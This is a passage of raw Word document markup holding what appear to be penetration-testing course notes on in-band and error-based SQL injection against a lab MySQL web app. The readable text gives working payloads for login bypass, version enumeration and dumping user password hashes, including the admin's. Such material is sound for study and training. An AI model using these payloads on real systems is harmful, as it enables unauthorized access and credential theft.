          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3986213" cy="2197527"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="504" name="image517.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image517.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId444"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3986213" cy="21975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8D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="711"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Random password provided</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000168E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000168F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001690">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In-band definition</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001691">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="699"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL injection is considered </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">in-band</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> when the vulnerable application</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> provides the result of the query along with the application-returned value</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. In this scenario, we've enabled SQL debugging inside the web application; however, most production-level web applications won't show these error messages because revealing SQL debugging information is considered a security flaw.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001692">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001693">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001694">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now we can do authentication bypass:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001695">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="900"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="2700338" cy="832604"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="263" name="image255.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image255.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId445"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2700338" cy="832604"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001696">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="900"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">offsec' OR 1=1 -- //</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001697">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001698">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can also use error-based payloads to do more, like enumerate the database</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001699">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000169A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We're using the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IN</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">operator to compare a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">boolean </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">value (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1=1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) with what should be a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">numeric </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">value (the database version). If this causes an error (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">which it should</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">), the application might indicate which values caused the error and thus allow us to get the database version number (since it will run the SQL command)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000169B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1030"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is why this is an "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">error-based</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" payload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000169C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000169D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000169E">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Look at version number:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000169F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' or 1=1 in (select @@version) -- //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016A0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="604"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MySQL accepts both </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">version() </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">@@version </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">statements.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="604"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4224338" cy="758214"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="21" name="image18.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image18.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId446"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4224338" cy="7582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A2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="604"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The running MySQL version (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">8.0.28</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) is included along with the rest of the web application payload. This means we can query the database interactively, like how we would use an administrative terminal.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016A3">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Dump Tables:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016A4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' OR 1=1 in (SELECT * FROM users) -- //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016A5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016A6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you receive an error like this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016A7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4691063" cy="879574"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="371" name="image365.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image365.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId447"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4691063" cy="87957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A8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="440"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then that means you can only specify one column at a time, as shown in the "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Operand should contain 1 column</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016A9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016AA">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Dump Tables one column at a time:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016AB">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' or 1=1 in (SELECT password FROM users) -- //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016AC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="673100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="59" name="image66.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image66.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId448"/>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16AD">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is somewhat helpful, as we managed to retrieve all user password hashes; however, we don't know which user each password hash corresponds to. We can solve the issue by adding a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> clause specifying which user's password we want to retrieve, in this case, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">admin</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016AE">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' or 1=1 in (SELECT password FROM users WHERE username = 'admin') -- //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016AF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016B0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4529138" cy="558884"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="199" name="image226.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image226.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId449"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
